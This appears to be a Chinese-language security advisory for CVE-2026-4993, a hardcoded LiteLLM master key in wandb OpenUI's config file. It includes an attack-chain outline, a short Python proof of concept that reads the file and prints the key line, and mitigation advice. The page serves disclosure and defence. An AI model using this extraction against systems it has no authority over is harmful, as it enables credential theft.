CVE-2026-4993 CVSS 3.3 低危

CVE-2026-4993 wandb OpenUI硬编码凭证漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4993

漏洞类型

硬编码凭证

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

wandb OpenUI

漏洞概述

CVE-2026-4993是wandb OpenUI中的一个低危安全漏洞。该问题源于backend/openui/config.py文件中LITELLM_MASTER_KEY参数存在硬编码凭证，允许本地低权限攻击者无需交互即可泄露敏感信息。目前漏洞利用代码已公开，且厂商尚未对此做出响应。

技术细节

该漏洞位于wandb OpenUI项目的配置文件backend/openui/config.py中。开发人员将敏感的LITELLM_MASTER_KEY以明文硬编码形式直接写入源代码，违反了安全编码规范。根据CVSS向量分析，攻击需具备本地访问权限（AV:L）及低权限级别（PR:L），且无需用户交互（UI:N）。攻击者只需读取该特定文件即可提取凭证。获取此密钥后，攻击者可能进一步利用它访问LiteLLM服务或相关后端资源，造成机密性泄露。由于厂商未发布补丁，风险持续存在。

攻击链分析

STEP 1

步骤1：本地访问

攻击者获取目标系统的本地低权限访问权限。

STEP 2

步骤2：文件定位

攻击者遍历文件系统，找到wandb OpenUI的安装目录并定位到backend/openui/config.py文件。

STEP 3

步骤3：信息读取

攻击者读取config.py文件内容，搜索LITELLM_MASTER_KEY变量。

STEP 4

步骤4：凭证获取

攻击者提取硬编码的Master Key，利用该凭证访问受保护的LiteLLM服务，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-4993
# This script demonstrates extracting the hardcoded key from the config file.
# Requirement: Local read access to the backend/openui/config.py file.

import os

def check_harcoded_creds(file_path):
    print(f"[*] Checking {file_path} for hardcoded credentials...")
    try:
        if os.path.exists(file_path):
            with open(file_path, 'r') as f:
                content = f.read()
                # Check if the vulnerable variable exists
                if 'LITELLM_MASTER_KEY' in content:
                    print("[+] Vulnerability Found: LITELLM_MASTER_KEY detected.")
                    for line in content.splitlines():
                        # Extract the line containing the key for demonstration
                        if 'LITELLM_MASTER_KEY' in line and '=' in line:
                            print(f"[+] Extracted Data: {line.strip()}")
                else:
                    print("[-] Vulnerable pattern not found.")
        else:
            print(f"[-] File {file_path} does not exist.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Path based on the vulnerability description
    target_path = "backend/openui/config.py"
    check_harcoded_creds(target_path)

影响范围

wandb OpenUI up to 0.0.0.0/1.0

防御指南

临时缓解措施

建议立即检查backend/openui/config.py文件，删除硬编码的LITELLM_MASTER_KEY。将敏感凭证迁移至环境变量或加密的配置存储中，并确保该配置文件的文件系统权限设置为仅允许必要的服务账户读取。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4993
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4993
3 Details https://www.cvedetails.com/cve/CVE-2026-4993/
4 VulDB https://vuldb.com/cve/CVE-2026-4993
5 Link https://gist.github.com/YLChen-007/3bf37486022d4c57caec3a35cd79ac92
6 Link https://vuldb.com/?ctiid.353880
7 Link https://vuldb.com/?id.353880
8 Link https://vuldb.com/?submit.778265

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表